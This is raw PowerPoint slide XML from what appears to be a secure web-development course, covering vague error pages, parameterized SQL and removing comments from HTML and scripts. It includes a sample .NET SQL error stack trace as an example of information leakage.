              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that authentication (and anything else…)  fails safely – do not expose any information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“403 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forbidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, “401 Unauthorized”, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>other “helpful” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>error messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supply customized “deliberately vague” error pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensure “invalid password” and “invalid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” present the exact same error message AND URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11329715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10 (Cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> (0x80131904): Unclosed quotation mark after the character string ')/&gt;')'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>Incorrect syntax near ')/&gt;')'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlConnection.OnError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>SqlException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> exception, Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>breakConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Action`1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>wrapCloseInAction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>TdsParserStateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>stateObj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>callerHasConnectionLock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>asyncClose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.TdsParser.TryRun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>RunBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>runBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>SqlCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>cmdHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>SqlDataReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>dataStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>BulkCopySimpleResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>bulkCopyHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>TdsParserStateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>stateObj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Boolean&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>dataReady</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlDataReader.TryConsumeMetaData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlDataReader.get_MetaData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlCommand.FinishExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>SqlDataReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> ds, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>RunBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>runBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>resetOptionsString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlCommand.RunExecuteReaderTds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>CommandBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>cmdBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>RunBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>runBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>returnStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>async</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Int32 timeout, Task&amp; task, Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>asyncWrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>SqlDataReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> ds)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlCommand.RunExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>CommandBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>cmdBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>RunBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>runBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>returnStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, String method, TaskCompletionSource`1 completion, Int32 timeout, Task&amp; task, Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>asyncWrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlCommand.RunExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>CommandBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>cmdBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>RunBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>runBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>returnStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, String method)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlCommand.ExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>CommandBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> behavior, String method)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.SqlClient.SqlCommand.ExecuteDbDataReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>CommandBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> behavior)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at System.Data.Common.DbCommand.System.Data.IDbCommand.ExecuteReader(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>CommandBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> behavior)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.Common.DbDataAdapter.FillInternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>DataSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> dataset, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>DataTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>datatables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Int32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>startRecord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Int32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>maxRecords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>srcTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>IDbCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> command, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>CommandBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> behavior)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.Common.DbDataAdapter.Fill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>DataSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>dataSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Int32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>startRecord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, Int32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>maxRecords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>srcTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>IDbCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> command, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>CommandBehavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> behavior)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>System.Data.Common.DbDataAdapter.Fill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>DataSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>dataSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>   at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>MeatPlantsReport.Printpage.Page_Load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>(Object sender, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>EventArgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> e)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>ClientConnectionId:5629e5aa-7f0d-470d-b423-f44fc98e475d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>Error Number:105,State:1,Class:15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36351684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11 (A1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use parameterized SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DO NOT “construct” an SQL statement by concatenating form data to SQL “boilerplate”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Parameterized SQL pre-parses an SQL statement that contains “placeholders” that are later filled in  without being parsed, so are inserted “as-is” into the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32886222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11 (cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="152400"/>
            <a:ext cx="6019800" cy="6019800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10939546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12 (A6) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove comments from all HTML and scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comments can be read by end user – may reveal “internal” information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Program logic/flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validation hints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data field relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Database specifics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“fix this later” (known bug)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AND – your site will load and run faster!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
